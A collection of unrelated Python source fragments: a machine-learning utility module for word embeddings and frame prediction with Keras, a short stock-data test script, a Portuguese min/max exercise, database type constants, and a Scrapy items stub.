    Loads GloVe-style word embeddings ("token v1 v2 ... vn" per line) into a dict.

    Terminates the process (exit code -10) if the file is missing.

    :param glove_file: path to the embeddings text file
    :param embedding_size: dimensionality of each embedding vector
    :return: dict mapping token -> numpy vector of shape (embedding_size,)
    """
    logger.info("Load word embeddings from \"{}\" ({}d)", glove_file.absolute(), embedding_size)
    word_vector_map = dict()
    if not glove_file.exists():
        # BUGFIX (message): corrected grammar of the error text.
        logger.critical("Either \"{}\" doesn't exist in general or you forgot to download it!",
                        glove_file.absolute())
        exit(-10)
    with glove_file.open(mode="r", encoding="utf-8") as reader:
        for line in reader:
            # The token is everything up to the first space; the rest is the vector.
            split_pos = line.index(" ")
            word_vector_map[line[:split_pos].strip()] = numpy.fromstring(line[split_pos:].strip(),
                                                                        dtype="float32", sep=" ",
                                                                        count=embedding_size)
    logger.info("Collected {} word embeddings", len(word_vector_map))
    logger.debug("Loaded {} word embeddings", len(word_vector_map))
    return word_vector_map
def prepare_X(arguments: List[dict], max_seq_len: int, word_embedding_dict: dict, word_embedding_length: int,
              filter_unknown_frames=False, frame_set=Frames.media_frames_set, using_topic=False, using_premise=True,
              using_conclusion=True) -> numpy.ndarray:
    """
    Converts the arguments into a padded 3D tensor of word embeddings.

    :param arguments: the samples (row dicts as produced by load_csv)
    :param max_seq_len: maximum number of tokens per argument (longer arguments are truncated)
    :param word_embedding_dict: token -> embedding vector
    :param word_embedding_length: dimensionality of each embedding vector
    :param filter_unknown_frames: if True, drop samples whose generic frame is unknown
    :param frame_set: frame set used for the unknown-frame filtering
    :param using_topic: include the topic text
    :param using_premise: include the premise text
    :param using_conclusion: include the conclusion text
    :return: array of shape (num_samples, max_seq_len, word_embedding_length)
    """
    assert isinstance(arguments, list)
    num_samples = len(arguments)
    if filter_unknown_frames:
        arguments = [s for s in arguments if s.get("genericFrame", "__UNKNOWN__") in frame_set.frame_names]
        logger.info("You ignore unknown frames. This costs you in this section {} samples",
                    (num_samples - len(arguments)))
        num_samples = len(arguments)
    ret = numpy.zeros(shape=(num_samples, max_seq_len, word_embedding_length), dtype="float32")
    # BUGFIX (message): this is the X-input matrix, not the y-output matrix.
    logger.debug("Created a X-input-matrix of shape {}", ret.shape)
    for c_r, sample in enumerate(arguments, 0):
        # " ".join also copes with an empty part selection (reduce raised a TypeError).
        arg_string = " ".join(argument_to_str(sample, using_topic=using_topic,
                                              using_premise=using_premise, using_conclusion=using_conclusion))
        logger.trace("Processes Arg[{}] now", arg_string)
        tokens = [t.lower() for t in nltk.word_tokenize(arg_string)]
        if len(tokens) > max_seq_len:
            if len(tokens) > max_seq_len * 2:
                logger.warning("\"{}\" has more than {} tokens: {}. Consider a longer max_length!", arg_string,
                               max_seq_len, len(tokens))
            else:
                logger.debug("\"{}\" has more than {} tokens: {}", arg_string, max_seq_len, len(tokens))
            tokens = tokens[:max_seq_len]
        for t_r, token in enumerate(tokens, 0):
            # Unknown tokens map to a 1-vector; padded tail positions stay 0-vectors.
            ret[c_r, t_r] = word_embedding_dict.get(token, numpy.ones(shape=(word_embedding_length,)))
    logger.debug("Pre-Processed {} X-values now", len(arguments))
    return ret
def compute_y_frame_distribution(samples: List[Dict], frames: Union[GenericFrame, UserLabelCluster],
                                 ignore_unknown=False, enable_fuzzy_framing=False) -> numpy.ndarray:
    """
    Computes the ground-truth frame distribution (y-matrix) for the given samples.

    :param samples: the samples (row dicts providing "genericFrame"/"fuzzyFrame" or "frame")
    :param frames: either a GenericFrame (generic frame classes) or a UserLabelCluster
                   (clustered user labels) -- decides how each sample is encoded
    :param ignore_unknown: if True (GenericFrame only), samples with unknown generic
                           frames are dropped beforehand
    :param enable_fuzzy_framing: if True (GenericFrame only), the soft "fuzzyFrame"
                                 distribution is used instead of the hard label
    :return: an array of shape (num_samples, prediction_vector_length)
    """
    num_samples = len(samples)
    if ignore_unknown and isinstance(frames, GenericFrame):
        samples = [s for s in samples if s.get("genericFrame", "__UNKNOWN__") in frames.frame_names]
        logger.info("You ignore unknown frames. This costs you in this section {} samples",
                    (num_samples - len(samples)))
        num_samples = len(samples)
    # The row width depends on the frames object kind.
    ret = numpy.zeros(shape=(num_samples,
                             frames.get_prediction_vector_length(ignore_unknown=ignore_unknown)
                             if isinstance(frames, GenericFrame) else frames.get_y_length()
                             ),
                      dtype="float32")
    logger.debug("Created a y-output-matrix of shape {}", ret.shape)
    for c_r, sample in enumerate(samples, 0):
        if isinstance(frames, GenericFrame):
            if not enable_fuzzy_framing:
                ret[c_r] = frames.decode_frame_label(sample.get("genericFrame", "__UNKNOWN__"),
                                                     ignore_unknown=ignore_unknown)
            else:
                # "fuzzyFrame" looks like "(label:weight) (label:weight) ..." -- split into
                # single "label:weight" chunks first.
                frame_distribution = [frame.strip("() ").split(":", 2) for frame in
                                      str(sample.get("fuzzyFrame", "(__UNKNOWN__:1.0)")).split(") (")]
                try:
                    frame_distribution = {f_d[0]: float(f_d[1]) for f_d in frame_distribution}
                    ret[c_r] = frames.decode_frame_label(frame_distribution, ignore_unknown=ignore_unknown)
                except ValueError as e:
                    # A malformed weight leaves this sample's row all-zero.
                    logger.error("Failure {}: leave the {}. prediction vector blank!", e, c_r)
        elif isinstance(frames, UserLabelCluster):
            ret[c_r] = frames.get_y(user_label=sample.get("frame", "neutral"))
    logger.trace("DONE")
    return ret
def compute_y_user_label_to_generic_frame_distribution(samples: List[Dict], word2vec: Dict, frames: GenericFrame,
                                                       enable_fuzzy_framing=False,
                                                       enable_other_class=True) -> numpy.ndarray:
    """
    Maps each sample's *user* frame label onto the *generic* frame set by computing
    the word-movers-distance between the user label and each generic frame name.

    :param samples: the samples (providing a "frame" key with the user label)
    :param word2vec: token -> embedding vector dict used by the distance model
    :param frames: the generic frame set to map onto
    :param enable_fuzzy_framing: if True, a normalized closeness distribution is returned
                                 per sample; otherwise a one-hot vector of the closest frame
    :param enable_other_class: if True, a trailing "other" class is used whose
                               pseudo-distance grows with the spread of the real distances
    :return: an array of shape (num_samples, prediction_vector_length)
    """
    num_samples = len(samples)
    model = word_mover_distance.WordEmbedding(model=word2vec)
    logger.trace("Created a word_mover_distance-model: {}", model)
    frames_tokens = frames.get_all_frame_names(tokenized=True, lower=True)
    logger.debug("We will compute the distances to the following frames: {}", ", ".join(frames.frame_names))
    ret = numpy.zeros(shape=(num_samples,
                             frames.get_prediction_vector_length(ignore_unknown=not enable_other_class)),
                      dtype="float32")
    logger.debug("Created a return-template of shape {}", ret.shape)
    for i, sample in enumerate(samples):
        # Splits e.g. "economy/trade" at the first slash between word characters.
        # NOTE(review): the pattern is not a raw string -- "\w"/"\/" only work because
        # Python passes unknown escapes through; consider r"(?<=\w)/(?=\w)".
        frame = re.sub(string=sample.get("frame", "unknown").strip("\"' "),
                       pattern="(?<=\w)\/(?=\w)", repl=" ", count=1)
        logger.trace("Fetched a label (user frame): {}", frame)
        frame_tokens = [t.lower() for t in nltk.word_tokenize(text=frame, language="english", preserve_line=False)]
        logger.trace("Will compute the word-movers-distance to [{}]", "-".join(frame_tokens))
        word_movers_distances = numpy.zeros(shape=(frames.get_prediction_vector_length(ignore_unknown=not enable_other_class),),
                                            dtype="float32")
        for j, generic_frame_tokens in enumerate(frames_tokens):
            word_movers_distances[j] = model.wmdistance(document1=frame_tokens, document2=generic_frame_tokens)
        if enable_other_class:
            # The "other" pseudo-distance scales with the spread of the real distances.
            word_movers_distances[-1] = (numpy.max(word_movers_distances)-numpy.min(word_movers_distances[:-1])) *\
                                        word_movers_distances.shape[0] * 0.5
        logger.trace("Total distribution: {} (not normalized)", word_movers_distances)
        if enable_fuzzy_framing:
            # Convert distances to closenesses and normalize to a probability-like vector.
            word_movers_closeness = numpy.add(numpy.negative(word_movers_distances), numpy.max(word_movers_distances))
            ret[i] = numpy.divide(word_movers_closeness, max(numpy.array(0.001, dtype="float32"),
                                                             numpy.sum(word_movers_closeness)))
        else:
            # Hard assignment: one-hot vector of the closest generic frame.
            min_index = 0
            min_distance = word_movers_distances[0]
            for j, d in enumerate(word_movers_distances):
                if d < min_distance:
                    min_index = j
                    min_distance = d
            ret[i, min_index] = 1.0
    return ret
def compute_y_word_embedding(samples: List[dict], word_vector_map: dict, embedding_length: int, filter_stop_words=True,
                             max_seq_len=-1) -> numpy.ndarray:
    """
    Computes the target (y) word-embedding representation of each sample's user frame label.

    If ``max_seq_len <= 0`` the embeddings of all label tokens are averaged into one
    vector per sample; otherwise the truncated/padded token embedding sequence is used.

    :param samples: the samples (must contain a "frame" key, i.e. the basic csv-file)
    :param word_vector_map: token -> embedding vector
    :param embedding_length: dimensionality of each embedding vector
    :param filter_stop_words: if True, stop words are removed from the label
    :param max_seq_len: maximum token count per label, or <= 0 for averaging
    :return: array of shape (num_samples, embedding_length) or
             (num_samples, max_seq_len, embedding_length)
    """
    assert isinstance(samples, list)
    assert isinstance(word_vector_map, dict)
    num_samples = len(samples)
    if max_seq_len <= 0:
        ret = numpy.zeros(shape=(num_samples, embedding_length), dtype="float32")
    else:
        ret = numpy.zeros(shape=(num_samples, max_seq_len, embedding_length), dtype="float32")
    logger.debug("Created a y-output-matrix of shape {}", ret.shape)
    for c_r, sample in enumerate(samples, 0):
        frame = sample.get("frame", None)
        if frame is None:
            # BUGFIX (message): "You sample" -> "Your sample".
            logger.warning("Your sample ({}) doesn't provide a [user] frame label - maybe you sent a wrong .csv-file "
                           "to this, but you have to use the basic csv-file!", sample)
        else:
            logger.trace("Process the frame \"{}\" now - first the NLP-basic pipeline", frame)
            # BUGFIX: raw strings for the regex patterns (avoids invalid-escape warnings).
            frame = re.sub(r"(?!-)\W", " ", frame)
            frame = frame.strip()
            frame = re.sub(r"\d+", "number", frame)
            frame = re.sub(r"'\w*\s", " ", frame)
            tokens = [t for t in nltk.word_tokenize(frame) if not filter_stop_words or t not in setStopWords]
            logger.debug("Pre-processing done: \"{}\" -> {}", frame, tokens)
            if len(tokens) == 0:
                logger.warning("Strange - the user label \"{}\" (clean: \"{}\") does not contain any token!",
                               sample["frame"], frame)
            else:
                if max_seq_len <= 0:
                    # Unknown tokens contribute a zero-vector to the average.
                    embedding_list = [word_vector_map.get(t, numpy.zeros(shape=(embedding_length,))) for t in tokens]
                    final_embedding = numpy.average(embedding_list, axis=0)
                else:
                    # the cosine similarity of zeros is always 0 (lowest), no matter what we predict.
                    # This isn't our goal, hence, we decide for
                    # 1-vector: unknown, but existing token
                    # -1-vector: not existing token = padding token
                    embedding_list = [word_vector_map.get(t, numpy.ones(shape=(embedding_length,))) for t in tokens]
                    final_embedding = embedding_list[:max_seq_len] \
                        if len(embedding_list) >= max_seq_len else \
                        (embedding_list +
                         [numpy.negative(numpy.ones(shape=(embedding_length,)))]
                         * (max_seq_len - len(embedding_list)))
                logger.trace("Final embedding is: {}", final_embedding)
                ret[c_r] = final_embedding
    return ret
def argument_to_str(input_argument_mapping, using_topic=False, using_premise=True, using_conclusion=True) -> List[str]:
    """
    Projects a sample dict onto the list of its textual argument parts.

    :param input_argument_mapping: a sample dict (e.g. produced by load_csv)
    :param using_topic: include the "topic" field
    :param using_premise: include the "premise" field
    :param using_conclusion: include the "conclusion" field
    :return: the selected texts ("<unk>" for missing fields); an empty list when the
             input is no (valid) mapping
    """
    try:
        output_argument_list = []
        if using_topic:
            output_argument_list.append(input_argument_mapping.get("topic", "<unk>"))
        if using_premise:
            output_argument_list.append(input_argument_mapping.get("premise", "<unk>"))
        if using_conclusion:
            output_argument_list.append(input_argument_mapping.get("conclusion", "<unk>"))
        return output_argument_list
    except AttributeError as e:
        logger.error("Error {}: the input {} is no (valid) map - maybe you projected the input already?", e,
                     input_argument_mapping)
        # BUGFIX: return an empty list instead of an implicit None, so callers that
        # join/iterate the result don't crash a second time.
        return []
# noinspection PyBroadException
def save_model(model: keras.Model, model_save_path=None, additional_metrics_to_plot=None) -> pathlib.Path:
    """
    Saves a trained keras model to disk (TF format, pickle as fallback) and, if the
    model carries a training history, renders a loss/accuracy plot next to it.

    Best-effort: every failure is logged, never raised.

    :param model: the (trained) keras model
    :param model_save_path: target directory; if None, "trained_model/<name>-<timestamp>"
    :param additional_metrics_to_plot: history keys to plot instead of the default
                                       (categorical) accuracy curves
    :return: the (possibly constructed) model_save_path
    """
    if additional_metrics_to_plot is None:
        additional_metrics_to_plot = []
    if model_save_path is None:
        logger.warning("Utils.save_model receives no model_save_path... try to construct one")
        model_save_path = pathlib.Path("trained_model").joinpath(
            "{}-{}".format(model.name, round(datetime.datetime.now().timestamp()))
        )
    try:
        model.save(filepath=(model_save_path.absolute()), overwrite=True, save_format="tf")
        logger.info("Save the trained model now in \"{}\"", model_save_path.absolute())
    except Exception as e:
        logger.error("Fail to save the fine-tuned NN in \"{}\", because of {}", model_save_path.absolute(),
                     type(e))
        # Fallback: at least pickle the model object.
        try:
            pickle.dump(model, pathlib.Path("{}.pkl".format(model_save_path)).open(mode="wb"))
        except Exception:
            logger.error("Failed also to pickle the fine-tuned NN in \"{}\" - give it up...",
                         "{}.pkl".format(model_save_path))
    try:
        if model.history is not None:
            logger.info("Interesting, \"{}\" has a history... save it!", model.name)
            # Plot history
            plt.plot(model.history.history["loss"], label='loss (train)')
            plt.plot(model.history.history["val_loss"], label='loss (val)')
            if len(additional_metrics_to_plot) == 0:
                # Default: plot whichever accuracy keys the history provides.
                train_acc = "categorical_accuracy" if "categorical_accuracy" in model.history.history.keys() else \
                    ("accuracy" if "accuracy" in model.history.history.keys() else None)
                val_acc = "val_categorical_accuracy" if "val_categorical_accuracy" in model.history.history.keys() else \
                    ("val_accuracy" if "val_accuracy" in model.history.history.keys() else None)
                try:
                    if train_acc is not None:
                        plt.plot(model.history.history[train_acc], label="categorical accuracy (train)")
                    if val_acc is not None:
                        plt.plot(model.history.history[val_acc], label="categorical accuracy (val)")
                except KeyError as e:
                    logger.error(e)
                    train_acc = None
                    val_acc = None
                if train_acc is not None and val_acc is not None:
                    plt.suptitle(t="Results of {}".format(model.name), fontsize="large", fontweight="demi")
                    plt.title("top-acc-train: {}/ top-acc-val: {}".format(
                        round(max(model.history.history[train_acc]), 3),
                        round(max(model.history.history[val_acc]), 3)))
                else:
                    # No accuracy available -- fall back to the best (lowest) losses.
                    plt.suptitle(t="Results of {}".format(model.name), fontsize="large", fontweight="book")
                    plt.title("top-acc-train: {}/ top-acc-val: {}".format(
                        round(min(model.history.history["loss"]), 3),
                        round(min(model.history.history["val_loss"]), 3)))
            else:
                for metric in additional_metrics_to_plot:
                    if metric in model.history.history.keys():
                        plt.plot(model.history.history[metric], label=metric)
                    else:
                        logger.error(
                            "You want to plot the metric \"{}\", but its not available in the history, only {}",
                            metric, ", ".join(model.history.history.keys()))
                # Title: best values of (up to) the first two requested metrics.
                title_appendix_list = ["{}:{}".format(m, round(max(model.history.history[m]), 3))
                                       for m in additional_metrics_to_plot if m in model.history.history.keys()]
                try:
                    plt.suptitle(t="Results of {}".format(model.name), fontsize="large", fontweight="roman")
                    plt.title("{}".format("|".join(title_appendix_list[:min(2, len(title_appendix_list))])
                                          if len(title_appendix_list) >= 1 else round(
                        min(model.history.history["val_loss"]), 3)))
                except KeyError as e:
                    logger.warning("Failure in plot (title): {}", e)
                    plt.title("Plot of {}".format(model.name))
            plt.ylabel('loss/ accuracy')
            plt.xlabel('No. epoch')
            plt.legend(loc="upper left")
            # NOTE(review): matplotlib renamed grid(b=...) to grid(visible=...); "b" is
            # removed in matplotlib >= 3.6 -- confirm the pinned matplotlib version.
            plt.grid(b=True, which="major", axis="y", color="gray", alpha=0.5, animated=False, linestyle="-",
                     linewidth=1.0)
            model_save_path_plot = model_save_path.joinpath("plot.png")
            logger.info("Will save plot to {}", model_save_path_plot)
            plt.savefig(fname=str(model_save_path_plot.absolute()), transparent=True)
    except Exception:
        logger.exception("Failed to save the plot")
    finally:
        # NOTE(review): a return in "finally" would also swallow uncaught exceptions of
        # the try-block; the broad except above already prevents any from escaping.
        return model_save_path
def add_plot_description(additional_text: str, model_save_path: pathlib.Path) -> None:
    """
    Writes the given text (hard-wrapped to 40 characters per line) onto the current
    matplotlib figure and saves it as "plot.png" inside the model directory.

    :param additional_text: the text to print on the plot; None means "do nothing"
    :param model_save_path: the directory of the saved model
    :return: nothing
    """
    if additional_text is None:
        return
    # Hard-wrap into 40-character chunks, each terminated by a newline.
    wrapped_chunks = [additional_text[pos:pos + 40] for pos in range(0, len(additional_text), 40)]
    print_text = "".join("{}\n".format(chunk) for chunk in wrapped_chunks)
    logger.trace("You want to print additional text on this plot: \"{}\". OK, I will try it!",
                 additional_text)
    plt.figtext(x=0.15, y=0.15, s=print_text)
    plot_target = model_save_path.joinpath("plot.png")
    logger.info("Will save plot to {}", plot_target)
    plt.savefig(fname=str(plot_target.absolute()), transparent=True)
def load_pre_trained_model(path: Optional[pathlib.Path]) -> Optional[keras.Model]:
    """
    Restores a keras model from disk.

    :param path: the saved-model location (None is allowed and yields None)
    :return: the loaded model, or None if loading was not possible
    """
    if path is None:
        return None
    if not path.exists():
        logger.error("Your given path \"{}\" does not exists - no model load!", path.absolute())
        return None
    try:
        return keras.models.load_model(path)
    except ImportError as e:
        logger.critical("Your given file path \"{}\" don't contain a valid h5-saved model: {}", path.name, e)
    except IOError as e:
        logger.error("IO-Error: {} (at \"{}\") - can't load the model!", e, path.absolute())
    return None
def to_same_sample_amount(data_lists: List[List[Dict]], under_sampling=False) -> List[List[Dict]]:
    """
    Equalizes the number of samples across several corpora.

    :param data_lists: the corpora
    :param under_sampling: if True, all corpora are cut down to the smallest one;
                           otherwise the shorter corpora are extended
    :return: the corpora, all of the same length
    """
    logger.info("You want the same number of samples in corpora [{}]",
                ", ".join(map(lambda cor: "{} samples".format(len(cor)), data_lists)))
    if under_sampling:
        smallest = len(min(data_lists, key=len))
        logger.warning("You under-sample! This means, that you will throw data away! Shrink to {}", smallest)
        return [cor[:smallest] for cor in data_lists]
    logger.debug("Extend the shorter corpora")
    corpus_sizes = [len(cor) for cor in data_lists]
    if len(set(corpus_sizes)) <= 1:
        # All corpora (or none at all) share the same size -- nothing to extend.
        logger.info("All of your corpora are already equal in the number of samples! Nothing to do!")
        return data_lists
    target_size = max(corpus_sizes)
    logger.info("Extend all corpora to a size of {}", target_size)
    return [extend_corpus_to_size(cor, target_size) for cor in data_lists]
def extend_corpus_to_size(corpus: List[Dict], size: int) -> List[Dict]:
    """
    Extends a corpus to exactly the given size by repeatedly appending shuffled
    copies of itself. The input list is never mutated.

    :param corpus: the corpus to extend
    :param size: the desired number of samples
    :return: a new list of ``size`` samples (the input itself if already big enough,
             or [] for an empty input)
    """
    if len(corpus) >= size:
        logger.debug("Nothing to do. The corpus has already the size {}", len(corpus))
        return corpus
    if len(corpus) == 0:
        # BUGFIX (message): corrected grammar.
        logger.critical("The input corpus must not be empty!")
        return []
    # Copy once (hoisted out of the loop) so random.shuffle never mutates the
    # caller's list; re-shuffling the same copy each round is distribution-equivalent.
    shuffle_pool = corpus.copy()
    ret = []
    while len(ret) < size:
        random.shuffle(shuffle_pool)
        if len(ret) + len(shuffle_pool) <= size:
            logger.trace("Extended the return list by the full batch of the input list")
            ret.extend(shuffle_pool)
        else:
            missing = size - len(ret)
            logger.trace("Extended the return list by the partial batch of the input list ({})", missing)
            ret.extend(shuffle_pool[:missing])
    return ret
def return_user_label_specific_word2vec_embedding(word2vec_dict: dict, train_user_labels: [dict],
                                                  embedding_length=None) -> dict:
    """
    Builds a word2vec dictionary restricted to the vocabulary of the training user labels.

    Each entry maps token -> (frequency in the training labels, embedding vector).
    Unknown tokens get a 1-vector; the special "<padding>" token gets a (-1)-vector
    with a pseudo frequency of half the number of training labels.

    :param word2vec_dict: the full token -> vector dictionary
    :param train_user_labels: the training samples (each providing a "frame" key)
    :param embedding_length: vector dimensionality; inferred from word2vec_dict if None
    :return: the reduced dictionary
    """
    if embedding_length is None:
        # Infer the dimensionality from an arbitrary dictionary value; values may be
        # plain vectors or (frequency, vector) tuples.
        embedding_length = [i for i in word2vec_dict.values()][0]
        if len(embedding_length) == 2:
            embedding_length = len(embedding_length[1])
        else:
            embedding_length = len(embedding_length)
    ret = dict()
    for user_label in train_user_labels:
        user_label = user_label.get("frame", "")
        user_label = [word for word in nltk.word_tokenize(text=user_label, language="english") if
                      word not in setStopWords]
        for word in user_label:
            if word in ret.keys():
                # BUGFIX: increment the token frequency (was "+ 0", which froze every
                # count at 1; the frequency is used as a weight downstream).
                ret[word] = (ret[word][0] + 1, ret[word][1])
            else:
                word_vector = word2vec_dict.get(word, numpy.ones(shape=(embedding_length,), dtype="float32"))
                ret[word] = (1, word_vector)
    ret["<padding>"] = (int(len(train_user_labels) / 2),
                        numpy.negative(numpy.ones(shape=embedding_length, dtype="float32")))
    return ret
def calculates_predicted_words_specific_frame(word_vectors_prediction: Union[tensorflow.Tensor, numpy.ndarray],
                                              target_word2vec: dict,
                                              embedding_size=None, output_vector_tensors=False) -> \
        [(str, Union[tensorflow.Tensor, numpy.ndarray])]:
    """
    Maps each predicted word vector back to its closest word of the target vocabulary.

    The score is a cosine similarity weighted by the word frequency (frequent words
    are preferred); the "<padding>" token is excluded as long as first_token_process
    is set.

    :param word_vectors_prediction: a single prediction of shape (tokens, embedding);
                                    a batch of shape (batch, tokens, embedding) is
                                    handled recursively
    :param target_word2vec: word -> vector or word -> (frequency, vector) dictionary
    :param embedding_size: dimensionality of the vectors; inferred if None
    :param output_vector_tensors: (tensorflow input only) if True, return the mapped
                                  word vectors as a tensor instead of (word, vector) pairs
    :return: a list of (word, word_vector) pairs, one per predicted token
    """
    target_word2vec_exclude_padding = target_word2vec.copy()
    if "<padding>" in target_word2vec:
        sample_value = target_word2vec_exclude_padding.pop("<padding>")
    else:
        sample_key, sample_value = target_word2vec_exclude_padding.popitem()
        logger.warning("Your target dictionary ({} keys) doesn't contain the padding-token! Popped \"{}\" instead",
                       len(target_word2vec), sample_key)
    # Normalize plain-vector dictionaries to (frequency, vector) tuples.
    sample_value_is_tuple = True
    if len(sample_value) != 2:
        sample_value_is_tuple = False
        target_word2vec = {k: (1, v) for k, v in target_word2vec.items()}
        target_word2vec_exclude_padding = {k: (1, v) for k, v in target_word2vec_exclude_padding.items()}
    if embedding_size is None:
        logger.debug("We must calculate the embedding size first")
        embedding_size = len(sample_value[1] if sample_value_is_tuple else sample_value)
        logger.trace("The embedding size is {}", embedding_size)
    if len(word_vectors_prediction.shape) == 3:
        # Batch input: recurse per single prediction.
        logger.warning("You consider to input a batch into this function. "
                       "This function us for single predictions. However, we'll handle this")
        return [calculates_predicted_words_specific_frame(word_vectors_prediction=single_prediction,
                                                          target_word2vec=target_word2vec,
                                                          embedding_size=embedding_size) for single_prediction in
                word_vectors_prediction]
    elif len(word_vectors_prediction.shape) not in [2, 3]:
        # NOTE(review): only "!= 2" can still trigger here (rank 3 returned above).
        logger.error("This function expects a input of shape (word_vector_number, word_vector_vector), "
                     "but you input a shape of {}!", word_vectors_prediction.shape)
        return []
    elif word_vectors_prediction.shape[-1] != embedding_size:
        logger.error("Expects the same word embedding size, but get as prediction {}d und as dictionary {}d",
                     word_vectors_prediction.shape[-1], embedding_size)
        return []
    ret = []
    # While True, the padding token is not a valid candidate.
    first_token_process = True
    if isinstance(word_vectors_prediction, numpy.ndarray):
        # NOTE(review): unlike the tensorflow branch, first_token_process is never
        # cleared here, so padding is excluded for *every* token -- confirm intent.
        for word_vector in word_vectors_prediction:
            logger.trace("Calculates the cosine similarity with respect to the word frequency."
                         "Source: https://stackoverflow.com/questions/18424228/cosine-similarity-between-2-number-lists")
            cal = [(target_word, target_data[1],
                    (-1 + numpy.dot(word_vector, target_data[1]) /
                     (numpy.linalg.norm(word_vector) * numpy.linalg.norm(target_data[1]))) *
                    (0.7 + (1 / max(1, target_data[0]) * 0.3))) for target_word, target_data
                   in (target_word2vec_exclude_padding.items() if first_token_process else target_word2vec.items())]
            ret.append(max(cal, key=lambda c: c[2])[:2])
            logger.trace("Selected from {} the element {}", cal, ret[-1])
    elif isinstance(word_vectors_prediction, tensorflow.Tensor):
        def cos(fn_word_vector):
            # Same scoring as the numpy branch, expressed as tensorflow ops for map_fn.
            nonlocal first_token_process
            logger.trace("Calculates the cosine similarity in tensorflow with respect to the word frequency."
                         "Source: https://stackoverflow.com/questions/18424228/cosine-similarity-between-2-number-lists")
            fn_cal = [(target_word, target_data[1],
                       tensorflow.multiply(
                           tensorflow.subtract(
                               tensorflow.divide(
                                   tensorflow.reduce_sum(tensorflow.multiply(fn_word_vector, target_data[1])),
                                   tensorflow.multiply(tensorflow.norm(fn_word_vector),
                                                       numpy.linalg.norm(target_data[1]))),
                               1),
                           (0.7 + (1 / max(1, target_data[0]) * 0.3))
                       )
                       ) for target_word, target_data
                      in (target_word2vec_exclude_padding.items() if first_token_process else target_word2vec.items())]
            first_token_process = False
            # Manual argmax over the scored candidates.
            max_elem = fn_cal[0]
            if len(fn_cal) >= 2:
                for c in fn_cal[1:]:
                    if tensorflow.reduce_all(tensorflow.math.greater_equal(c[2], max_elem[2])):
                        max_elem = c
            ret.append(max_elem[:2])
            return max_elem[1]
        first_token_process = True
        if output_vector_tensors:
            return tensorflow.map_fn(fn=cos, elems=word_vectors_prediction)
        else:
            tensorflow.map_fn(fn=cos, elems=word_vectors_prediction)
            logger.debug(
                "Calculated for the current word-vector-prediction the corresponding word \"{}\" out of {} choices",
                ret[-1], len(target_word2vec))
    logger.info("Finished the mapping process ({} tokens): {}", len(ret), ret)
    return ret
|
#!/usr/bin/env python
import datetime
import os
from datetime import timedelta
from stock import stockImport
sk = stockImport()
# Historical experiment dates, kept for reference:
#start_date = datetime.date(2016, 12, 20)
#today = datetime.date(2016, 12, 30)
#start_date = datetime.date(2009, 9, 25)
#start_date = datetime.date(2004, 2, 11)
stocks = []
scan_date = datetime.date(2016, 12, 1)
# Load the full training set for stock "2330" -- presumably a 30-row input window
# and a 7-day horizon; confirm against stockImport.loadAllTrainDataByStock.
X,Y = sk.loadAllTrainDataByStock("2330", scan_date, 30, 7)
print len(X)
print len(Y)
exit(0)
# NOTE(review): everything below is dead code -- the exit(0) above always terminates.
# Collect all stock ids from the file names under bystock/.
for root, dirs, files in os.walk("bystock/"):
    for f in files:
        stocks.append(f.split('.')[0])
print stocks
exit(0)
# NOTE(review): start_date and today are undefined here (only assigned in the
# commented-out lines at the top) -- this would raise a NameError if ever reached.
print ("update dataframe from {} to {} ".format(start_date, today))
X = []
Y = []
test_date = datetime.date(2016, 1, 1)
d, r = sk.loadTrainDataByIdFixedRow('2330', test_date, 30, 7)
#print d.tolist()
#print len(d.tolist())
# Flatten the nested list and print it together with the target r.
print sum(d.tolist(), [])
#print len(sum(d.tolist(), []))
print r
test_date = datetime.date(2016, 2, 1)
d, r = sk.loadTrainDataByIdFixedRow('2330', test_date, 30, 7)
#print d.tolist()
#print len(d.tolist())
print sum(d.tolist(), [])
#print len(sum(d.tolist(), []))
print r
exit(0)
|
# Reads five integers and reports the smallest and largest one with their positions.
numeros = []
for _ in range(5):
    numeros.append(int(input('Digite Um Numero: ')))
print(f'\nO Menor valor Foi {min(numeros)} Na {numeros.index(min(numeros)) + 1}ª Posição')
print(f'O Maior valor Foi {max(numeros)} Na {numeros.index(max(numeros)) + 1}ª Posição')
|
# DATA FORM
FORM_NUM = 7
DF_SCALAR = 0
DF_VECTOR = 1
DF_PAIR = 2
DF_MATRIX = 3
DF_SET = 4
DF_DICTIONARY = 5
DF_TABLE = 6
DF_CHART = 7

# DATA TYPE
TYPE_NUM = 27
DT_VOID = 0
DT_BOOL = 1
DT_BYTE = 2
DT_SHORT = 3
DT_INT = 4
DT_LONG = 5
DT_DATE = 6
DT_MONTH = 7
DT_TIME = 8
DT_MINUTE = 9
DT_SECOND = 10
DT_DATETIME = 11
DT_TIMESTAMP = 12
DT_NANOTIME = 13
DT_NANOTIMESTAMP = 14
DT_FLOAT = 15
DT_DOUBLE = 16
DT_SYMBOL = 17
DT_STRING = 18
DT_UUID = 19
DT_FUNCTIONDEF = 20
DT_HANDLE = 21
DT_CODE = 22
DT_DATASOURCE = 23
DT_RESOURCE = 24
DT_ANY = 25
DT_DICTIONARY = 26
DT_OBJECT = 27
DT_DATETIME64 = 100

# Data type size in bytes (0 = variable-length / unsized).
DATA_SIZE = {
    DT_VOID: 0,
    DT_BOOL: 1,
    DT_BYTE: 1,
    DT_SHORT: 2,
    DT_INT: 4,
    DT_LONG: 8,
    DT_DATE: 4,
    DT_MONTH: 4,
    DT_TIME: 4,
    DT_MINUTE: 4,
    DT_SECOND: 4,
    DT_DATETIME: 4,
    DT_TIMESTAMP: 8,
    DT_NANOTIME: 8,
    DT_NANOTIMESTAMP: 8,
    DT_FLOAT: 4,
    DT_DOUBLE: 8,
    DT_SYMBOL: 0,
    DT_STRING: 0,
    DT_ANY: 0,
    DT_DICTIONARY: 0,
    DT_OBJECT: 0,
}

## xxdb NAN values
# Sentinel values representing NULL for each data type.
DBNAN = {
    DT_BYTE: -128,
    DT_BOOL: -128,
    DT_SHORT: -32768,
    DT_INT: -2147483648,
    DT_LONG: -9223372036854775808,
    DT_FLOAT: -3.4028234663852886e+38,
    DT_DOUBLE: -1.7976931348623157e+308,
    DT_SYMBOL: '',
    DT_STRING: '',
    DT_DATE: -2147483648,
    DT_MONTH: -2147483648,
    DT_TIME: -2147483648,
    DT_MINUTE: -2147483648,
    DT_SECOND: -2147483648,
    DT_DATETIME: -2147483648,
    DT_TIMESTAMP: -9223372036854775808,
    DT_NANOTIME: -9223372036854775808,
    DT_NANOTIMESTAMP: -9223372036854775808,
}

# partition Schema
SEQ = 0
VALUE = 1
RANGE = 2
LIST = 3
COMPO = 4
HASH = 5
|
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
